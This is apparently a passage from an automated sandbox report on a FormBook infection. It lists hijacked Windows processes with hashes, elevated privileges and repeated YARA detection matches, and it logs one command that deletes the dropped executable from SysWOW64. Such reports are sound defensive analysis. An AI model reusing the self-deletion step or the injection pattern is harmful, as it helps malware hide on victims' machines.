              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              General

              Start time:11:26:27
              Start date:14/01/2022
              Path:C:\Windows\SysWOW64\colorcpl.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\colorcpl.exe
              Imagebase:0x9a0000
              File size:86528 bytes
              MD5 hash:746F3B5E7652EA0766BA10414D317981
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              General

              Start time:11:26:35
              Start date:14/01/2022
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Windows\SysWOW64\DpiScaling.exe"
              Imagebase:0x11d0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:11:26:37
              Start date:14/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff724c50000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:11:26:39
              Start date:14/01/2022
              Path:C:\Windows\SysWOW64\logagent.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\System32\logagent.exe
              Imagebase:0xe00000
              File size:86016 bytes
              MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              General

              Start time:11:26:43
              Start date:14/01/2022
              Path:C:\Windows\SysWOW64\msdt.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\msdt.exe
              Imagebase:0xdc0000
              File size:1508352 bytes
              MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              General

              Start time:11:27:13
              Start date:14/01/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
              Imagebase:0x7ff6fee60000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >